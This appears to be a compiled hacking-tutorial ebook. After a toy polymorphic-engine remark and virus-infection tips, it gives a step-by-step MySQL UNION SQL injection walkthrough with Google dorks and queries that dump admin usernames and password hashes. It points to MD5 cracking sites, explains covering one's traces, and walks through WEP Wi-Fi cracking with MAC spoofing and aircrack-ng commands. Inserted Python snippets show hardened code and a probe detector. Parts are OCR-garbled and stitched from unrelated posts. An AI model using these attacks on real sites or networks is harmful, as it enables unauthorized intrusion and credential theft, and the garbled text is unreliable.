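The constant stub is the weak point of this toy engine: a vendor would simply take STUB_MAGIC as the signature. That is exactly why a real polymorphic engine also rewrites the decoder on every generation, and why scanners moved from string matching to emulating the first few thousand instructions of a suspect file before matching.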
File Extension Virus
File extension viruses exploit the way file extensions are displayed. .TXT is safe, as it indicates a pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS you will only see BAD.TXT. If you've forgotten that extensions are actually turned off, you might think this is a text file and open it. This is really an executable Visual Basic Script virus file and could do serious damage.
The countermeasure is to turn off "Hide extensions for known file types" in Windows (Folder Options > View).
=ow to stop virus or tro?an attacks
If you want to know that your system is either infected by viruses and tro'ans then these
are certain techni)ues to know that$
3. Your !omputer might be running slow usual than normal.
>. Some programs might open without your permission.
@. System start up takes too much time to start.
2. 0arious Arror messages appear on Screen when you open something or without
opening also.
<. System registry has been disabled or folder options is missing.
1. #he most important antivirus shows messages of detecting viruses time to time.
B. hile scanning your system from any antivirus or anti spyware tool its showing
viruses and you noticed that viruses are not deleting.
and much more…
;ave you ever think about the reason why your system is got infected. hat has
infected your system and if its done by any of your friend ;ow he has done it. Surely o6
or in some cases you have tried to find the answer but you are not able to get proper
answer. 7ut story is different here 6 I will tell all the ways ;ow your system can be Cet
infected and ;ow you can protect it if its already infected ;ow you can resolve the
problem. So here are few things ;ow your System got Infected 6 some might be knowing
this but by some reason they have ignored them.
How a System Gets Infected Because of Negligence?
1. Using Cracked Versions of software, especially security ones like antivirus, anti-spyware etc.
Why I have said this is the first and major cause of infection is because of the following simple reason: all hackers know that the general internet-using public always searches for cracked versions of software and wishes to use them for free, and hackers take advantage of this. You will all now be thinking how this helps hackers. We know that almost all antivirus software shows each and every keygen as a virus or some trojan, depending upon its type. Now if we all know that, then how would hackers forget this fact? So what they do is attach trojans and viruses to these files, and when your antivirus shows it as a virus you ignore the alert and keep the keygen, meaning the trojan, running.
NOTE: And guys, an important note for you all! If your antivirus doesn't show any keygen or crack as a virus, then don't ever think that it's not a virus; it is a most dangerous thing. Why dangerous? Because now the hacker has used some more brains to fool you: he has made the virus undetectable by simply editing the hex code of the original virus. So what is the moral of the story? Please don't use cracked versions.
Now you will all be thinking that if we don't use the cracked versions, then how will we be able to get full versions of the software? Don't worry, when I am there no fear, drink beer and enjoy everything for free. Its solution will be in the solutions step, just read the article.
2. Pen drive or USB drive:
The biggest cause of infection of your system is USB drives and external hard disks. Now how does a virus enter your system using USB drives? You have connected your USB drive to your friend's computer and by chance (sorry, it's for sure, i.e. 100%) your friend's system is infected by a virus or Trojans, and it's the property of a virus that it replicates itself using memory. So when you connect your USB to your friend's computer, your USB is now infected by the virus. Now when you connect this USB to your PC, Windows has the property that it searches the files in a newly connected device and autoruns the device; for doing this it loads the index of your USB's file system into memory, and if the USB has a virus, it's the property of the virus that it replicates itself using system memory. Now if you are using a good antivirus, your antivirus will pop up warning and alert messages, and sometimes you ignore them, which means your system is also infected. For the USB drive virus solution keep reading the article.
3. Downloading things from Unknown Sites:
Most users search for things over the internet, and wherever they find their desired result, meaning the file that they want, they start downloading it from that site only. Now how does it affect your system? Suppose you want to download a wallpaper, say of Katrina Kaif. Now hackers know the fact that Katrina has a huge fan following and users will surely download it. Then what they do is simply bind their malicious code with some of the files, and when a user downloads it his system is infected, and he can never imagine that the virus came from the wallpaper that he downloaded from an unknown site. For its solution read on.
4. The most important one: Becoming a Hacker like Me (ROFL, but it's the truth).
Why I have mentioned this might already be clear to you from the above discussion. Most internet users are always curious to know ways how they can hack their friend's email account or his system; for this they download all types of shit from the internet, and believe me, 99.9% of this shit contains viruses and Trojans that send your information to the providers. Now I don't say stop hacking, but try to follow some basic steps to learn hacking, and first of all you must know how to protect yourself from such types of fake software. For its solution read on.
Now, after discussing how your system gets infected by your simple negligence, it's time you should know how to fix it and protect your system from all types of viruses and trojans.
HOW TO STOP VIRUS OR TROJANS ??
1. Using Good Antivirus:
There is a common misconception among internet users that a full antivirus provides better security. Yes, it's 100% true, but full antiviruses means paid ones, not the cracked ones. There are several other solutions that you will get absolutely free, and I guarantee that they will protect your system 100% by just doing some little configuration.
Best Free Antivirus: Avira Personal Antivirus, i.e. Antivir.
You can download Avira for free from:
http://www.filehippo.com/download_antivir/
Now after downloading the antivirus, what do you have to do to make it as good as paid antiviruses?
a. Install the antivirus and update it. Note: updating the antivirus regularly is compulsory. Don't worry, it's not your work; it will update itself automatically whenever an update is available.
b. After installing, at the right-hand top corner you will see a CONFIGURATION button. Just click on it; now a new window will pop up.
c. Now there at the left-hand top you will see a check box in front of which "Expert" is written. Click on that; now you will see several things in it. Now do the following settings one by one.
1. Click on "Scanner", click on all files, set the "Scanner Priority" to high and click on apply.
2. Click on "Guard", click on all files, click on "Scan while reading and writing" and then click apply.
3. Click on "General". Now click on select all and click on apply. In the General tab only, go to the WMI section, click on advanced process protection and then click on apply.
4. After doing that restart your PC.
Now you have made your free antivirus equivalent to the paid one.
Best Free Anti-Spyware: Spyware Terminator with Crawler Web Security Toolbar.
Download it for free:

The solution of this problem is already provided: the Web Browser Security Toolbar will help you in surfing only secured and genuine websites, and if you want to visit and download, VirusTotal will help you identify whether the file is infected or not.
4. Now for Hackers like me, i.e. a Method to use or test Hack tools.
Why I have mentioned this is simply because hackers always take advantage of these noobish tricks: they attach viruses to files and name them as hack tools. So avoid them if you are too curious like me. Then there are several ways to handle it.
1. Use Deep Freeze on the C drive: For testing hack tools always use Deep Freeze, as after the next restart your system will be in the same position as it was previously.
2. Install VirtualBox and in VirtualBox install another Windows and test all hack tools using the virtual Windows. This will protect your system from being infected. Also it will give you more knowledge about handling viruses and other situations, like what to do when something goes wrong.
3. Create two to three fake email IDs and use them for testing keyloggers and other fake email hacking software.
For some more security tips you can also read my previous article:
HACKING WEB SERVER
Hello friends, welcome back to hacking class. Today I will explain all the methods that are being used to hack a website or a website's database. This is the first part of the class "How to hack a website or website's database", and in this I will introduce all website hacking methods. Today I will give you the overview, and in later classes we will discuss them one by one with practical examples. So guys, get ready for the first part of the Hacking websites class.
Don't worry, I will also tell you how to protect your websites from these attacks, and other methods like hardening of SQL and hardening of web servers, and key knowledge about CHMOD rights, that is, what thing should be given what rights.
Note: This post is only for Educational Purposes only.
What are the basic things you should know before website hacking?
First of all, everything is optional, as I will start from scratch. But you need at least basic knowledge of the following things:
1. Basics of HTML, SQL, PHP.
2. Basic knowledge of Javascript.
3. Basic knowledge of servers, that is, how servers work.
4. And most important, expertise in removing traces, otherwise you have to suffer the consequences.
Now the first two things you can learn from a very famous website for basics of website design with basics of HTML, SQL, PHP and Javascript:
http://www.w3schools.com/
And for the fourth point, that you should be expert in removing traces: for this you can refer to the first 5 hacking classes and especially read these two:
1. Hiding yourself from being traced.
2. Removing your Traces
As we know, traces are very important. Please don't ignore them, otherwise you can be in big trouble for simply doing nothing. So please take care of this step.
METHODS OF HACKING WEBSITES:
1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY
1. SQL INJECTION
First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in which an attacker "injects" SQL code through a web form or manipulates the URLs based on SQL parameters. It exploits web applications that use client-supplied SQL queries.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
2. CROSS SITE SCRIPTING
Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular, and some of the biggest websites have been affected by them, including the FBI, CNN, Ebay, Apple, Microsoft, and AOL.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading..
3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on websites. Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the currently logged-on user and to access files on the server. With this power the hacker can continue on to use local exploits to escalate his privileges and take over the whole system.
RFI can lead to the following serious things on a website:
• Code execution on the web server
• Code execution on the client side, such as Javascript, which can lead to other attacks such as cross site scripting (XSS).
• Denial of Service (DoS)
• Data Theft/Manipulation
4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI.
Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about; by means of directory traversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p=../../../../../../../etc/passwd
I will explain it in detail with practical website examples in later sequential classes on Website Hacking.
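An added example (not from the original post) of the include resolver behind a page like index.php?p=, written in Python rather than PHP: the unchecked form beside a hardened one that allowlists page names and verifies that the resolved path stays inside the pages directory. The temporary directory, the page names and the allowlist are constructed assumptions.

```python
import os
import tempfile

# Constructed stand-in for the site's pages directory; a real deployment
# would point this at its own includes folder.
PAGES_DIR = tempfile.mkdtemp(prefix="pages_")
with open(os.path.join(PAGES_DIR, "about.php"), "w") as fh:
    fh.write("<?php echo 'about'; ?>\n")

# Assumed allowlist of page names the application actually ships.
ALLOWED_PAGES = {"home", "about", "contact"}


def vulnerable_include_path(p, pages_dir=PAGES_DIR):
    """Mirror of include($pages_dir . '/' . $_GET['p']) with no checks.

    normpath collapses the '..' segments, so a p value with enough '../'
    resolves to a file outside pages_dir (e.g. /etc/passwd)."""
    return os.path.normpath(os.path.join(pages_dir, p))


def is_contained(base_dir, candidate):
    """Generic defence when an allowlist is not possible: resolve symlinks
    and '..', then require the result to remain under base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, candidate))
    return os.path.commonpath([base, target]) == base


def safe_include_path(p, pages_dir=PAGES_DIR, allowed=ALLOWED_PAGES):
    """Hardened resolver: only known page names, the .php suffix is added by
    the server, and the containment check runs anyway (defence in depth).
    Returns the absolute path to include, or None when the request is rejected."""
    if p not in allowed:
        return None
    filename = p + ".php"
    if not is_contained(pages_dir, filename):
        return None
    target = os.path.join(os.path.realpath(pages_dir), filename)
    return target if os.path.isfile(target) else None


if __name__ == "__main__":
    traversal = "../../../../../../../etc/passwd"
    print("vulnerable:", vulnerable_include_path(traversal))
    print("hardened:  ", safe_include_path(traversal))
    print("hardened about:", safe_include_path("about"))
```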
5. DDOS ATTACK
Simply called a distributed denial of service attack. A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS attack we consume the bandwidth and resources of a website and make it unavailable to its legitimate users.
For a more detailed hack on DDoS visit:
6. EXPLOITING VULNERABILITY
It's not a new category; it comprises the above five categories, but I mentioned it separately because there are several exploits which cannot be covered in the above five categories. So I will explain them individually with examples. The basic idea behind this is to find the vulnerability in the website and exploit it to get admin or moderator privileges so that you can manipulate things easily.
SQL INJECTION
Hello friends, in my previous class of How to hack websites I explained the various topics that we will cover in hacking classes. Let's today start with the first topic, the Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don't worry, read it here.
So guys, let's start our tutorial of Hacking Websites using the SQL injection technique. First of all, I will provide you a brief introduction to SQL injection.
Note: This article is for Educational Purposes only. Please Don't misuse it. Isoftdl and I are not responsible for any misuse done by you.
MySQL is a very common database system these days that websites use, and you will be surprised by the fact that it's the most vulnerable database system ever. It has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.
Hacking Websites using SQL Injection
STEPS TO HACK WEBSITES USING SQL INJECTION
1. Finding the target and vulnerable websites
First of all we must find out our target website. I have collected a lot of dorks, i.e. the vulnerability points of websites. Some Google searches can be awesomely utilized to find vulnerable websites. Below are examples of some queries:
Examples: Open Google and copy-paste these queries:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
Search Google for more Google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in the comments of this post, so keep posting and reading there.
2. Checking for Vulnerability on the website
Suppose we have a website like this:
http://www.site.com/products.php?id=7
To test this URL, we add a quote to it:
http://www.site.com/products.php?id=7'
On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right ... etc" or something like that, that means the target website is vulnerable to SQL injection and you can hack it.
3). Find the number of columns
To find the number of columns we use the statement ORDER BY (it tells the database how to order the result). So how to use it? Well, just keep incrementing the number until we get an error.
http://www.site.com/products.php?id=5 order by 1/* <-- no error
http://www.site.com/products.php?id=5 order by 2/* <-- no error
http://www.site.com/products.php?id=5 order by 3/* <-- no error
http://www.site.com/products.php?id=5 order by 4/* <-- Error (we get a message like this: Unknown column '4' in 'order clause', or something like that)
That means that it has 3 columns, because we got an error on 4.
4). Check for UNION function
With union we can select more data in one SQL statement.
So we have:
http://www.site.com/products.php?id=5 union all select 1,2,3/*
(we already found that the number of columns is 3 in section 2)
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
5). Check for MySQL version
http://www.site.com/products.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try --; it's a comment, and it's important for our query to work properly.
Let's say that we have number 2 on the screen; now to check the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
It should look like this:
http://www.site.com/products.php?id=5 union all select 1,@@version,3/*
If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE)": I didn't see any paper covering this problem, so I must write it. What we need is the convert() function, i.e.
http://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex(), i.e.
http://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version.
6). Getting table and column name
Well, if the MySQL version is less than 5 (i.e. 4.1.33, 4.1.12) <-- later I will describe it for MySQL versions greater than 5 -- we must guess the table and column name in most cases.
Common table names are: user/s, admin/s, member/s
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.
i.e. it would be:
http://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good)
We know that table admin exists.
Now to check column names:
http://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*
(if you get an error, then try the other column name)
We get the username displayed on screen; an example would be admin, or superadmin etc.
Now to check if the column password exists:
http://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*
(if you get an error, then try the other column name)
We see the password on the screen in hash or plain text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1.
Now we must complete the query to look nice. For that we can use the concat() function (it joins strings), i.e.
http://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for colon).
(There is another way for that, char(58), the ASCII value for :)
http://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash.
When you have this, you can log in as admin or some superuser.
If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so the example would be:
http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
7). MySQL 5
Like I said before, I'm going to explain how to get table and column names in MySQL greater than 5.
For this we need information_schema. It holds all tables and columns in the database.
To get tables we use table_name and information_schema.tables, i.e.
http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.
http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1 (get 1 result starting from the 0th).
Now to view the second table, we change limit 0,1 to limit 1,1, i.e.
http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
The second table is displayed.
For the third table we put limit 2,1, i.e.
http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc.
To get the column names the method is the same. Here we use column_name and information_schema.columns. The method is the same as above, so the example would be:
http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed.
The second one (we change limit 0,1 to limit 1,1), i.e.
http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd etc.
If you want to display column names for a specific table use this query (where clause). Let's say that we found table users, i.e.
http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users.
Note that this won't work if magic quotes is ON.
Let's say that we found columns user, pass and email.
Now to complete the query to put them all together, for that we use concat(); I described it earlier, i.e.
http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
What we get here is user:pass:email from table users.
Example: admin:hash:whatever@blabla.com
But the passwords are in hash format, so we need to crack the hash. Note 90% of hashes are crackable but 10% are still there which are unable to be cracked. So don't feel bad if some hash doesn't crack.
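As an added illustration (not from the original tutorial), here is the kind of id= lookup the steps above exploit beside its hardened form, plus a small detector for the probe fragments used in steps 2 to 7. It uses SQLite in memory instead of MySQL so it runs offline; the products table, its rows and the function names are constructed.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the site's database behind products.php?id=."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(5, "widget", "9.99"), (7, "gadget", "19.99")])
    return conn


def vulnerable_lookup(conn, id_param):
    """The pattern the tutorial exploits: the raw ?id= value is glued into SQL,
    so a quote, an ORDER BY or a UNION in it is parsed as part of the query."""
    sql = "SELECT id, name, price FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def probe(conn, id_param):
    """What the error-based check in step 2 observes: either rows or the
    database's error text (which leaks whether the injection parsed)."""
    try:
        return ("ok", vulnerable_lookup(conn, id_param))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def safe_lookup(conn, id_param):
    """Hardened form: validate the type, then bind the value as a parameter.
    The database receives the integer as data, never as SQL text."""
    try:
        id_value = int(id_param)
    except (TypeError, ValueError):
        return []
    return conn.execute(
        "SELECT id, name, price FROM products WHERE id = ?", (id_value,)
    ).fetchall()


# Detection: the probes walked through in steps 2 to 7 leave recognisable
# fragments in the query string that a WAF rule or access-log search can flag.
PROBE_RE = re.compile(
    r"'\s*$|\border\s+by\s+\d+|\bunion\s+(all\s+)?select\b|"
    r"information_schema|@@version|\bconcat\s*\(",
    re.IGNORECASE,
)


def looks_like_sqli_probe(id_param):
    """True when the id= value carries one of the tutorial's probe fragments."""
    return PROBE_RE.search(id_param) is not None


if __name__ == "__main__":
    db = build_db()
    for value in ("7", "7'", "5 order by 4",
                  "5 union all select 1, sqlite_version(), 3"):
        print(repr(value), "->", probe(db, value), "| safe:", safe_lookup(db, value),
              "| flagged:", looks_like_sqli_probe(value))
```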
For Cracking the MD5 hash values you can use this:
1) Check the net whether this hash has been cracked before:
Download:
http://www.md5decrypter.co.uk
2) Crack the password with the help of a site:
Download:
http://www.milw0rm.com/cracker/insert.php
or
http://passcracking.com/index.php
3) Use an MD5 cracking software:
Download:
http://rapidshare.com/files/13696976F_2.10_2b.rar
Password *(lsest
STEPS TO HACK WIFI OR WIRELESS PASSWORD
1. Get the Backtrack-Linux CD. Backtrack Linux Live CD (the best Linux available for hackers, with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: HERE
2. SCAN TO GET THE VICTIM
Get the victim to attack, that is, whose password you want to hack or crack.
Now enter the Backtrack Linux CD into your CD drive and start it. Once it's started, click on the black box in the lower left corner to load up a KONSOLE. Now you should start your Wifi card. To do so type:
airmon-ng
You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card. Now type:
airmon-ng stop ath0
then type:
ifconfig wifi0 down
then type:
macchanger --mac 00:11:22:33:44:55 wifi0
then type:
airmon-ng start wifi0
The above steps I have explained are to spoof yourself from being traced. In the above step we are spoofing our MAC address; this will keep us undiscovered.
Now type:
airodump-ng ath0
All the above steps in one screenshot:
Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others, and it's always a good idea to pick one that has the best signal strength; otherwise it will take a huge time to crack or hack the password, or you may not be able to crack it at all.
Once you see the network list, select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and press C.
Now you will see something like this:
3. SELECTING NETWORK FOR HACKING
Now find the network that you want to crack and MAKE SURE that it says the encryption for that network is WEP. If it says WPA or any variation of WPA then move on; you can still crack WPA with Backtrack and some other tools, but it is a whole other ball game and you need to master WEP first.
Once you've decided on a network, take note of its channel number and bssid. The bssid will look something like this --
00:23:69:bb:2d:of
The channel number will be under a heading that says "CH". As shown in this figure:
Now in the same KONSOLE window type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0
The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive, to crack later. You don't even put in an extension, just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. It's simply because I love ben10. hhahahahaha :D
Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them ben1, ben2 etc.
Once you have typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector", but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IV's, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. The more difficult the password, the more packets you will need to crack it.
4. Cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In this window type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44: ath0
This will send some commands to the router that basically tell it to associate your computer even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out, with the last one saying something similar to "Association Successful :-)"
If this happens, then good! You are almost there.
Now type:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0
This will generate a bunch of text, and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean, just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds, sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Now type:
aircrack-ng -b (bssid) (filename)-01.cap
Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-01.cap
Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IV's. Retry at 10,000."
DON'T DO ANYTHING! It will stay running; it is just letting you know that it is on pause until more IV's are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it finally gets it.
If you do everything correctly up to this point, before too long you will have the password! Now if the password looks goofy, don't worry, it will still work. Some passwords are saved in ASCII format, in which case aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format, in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.
Take note, though, that the password will always be displayed in aircrack with a colon after every 2 characters. So for instance if the password was "secret", it would be displayed as:
se:cr:et
This would obviously be the ASCII format. If it was a HEX encrypted password that was something like "0FK9427F" then it would still display as:
0F:K9:42:7F
Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network and type in the password without the colons, and presto! You are in!
It may seem like a lot to deal with if you have never done it, but after a few successful attempts you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal activity that you do falls completely on you, because technically this is just for you to test the security of your own network.
I hope you all liked it. If you have any queries then ask me.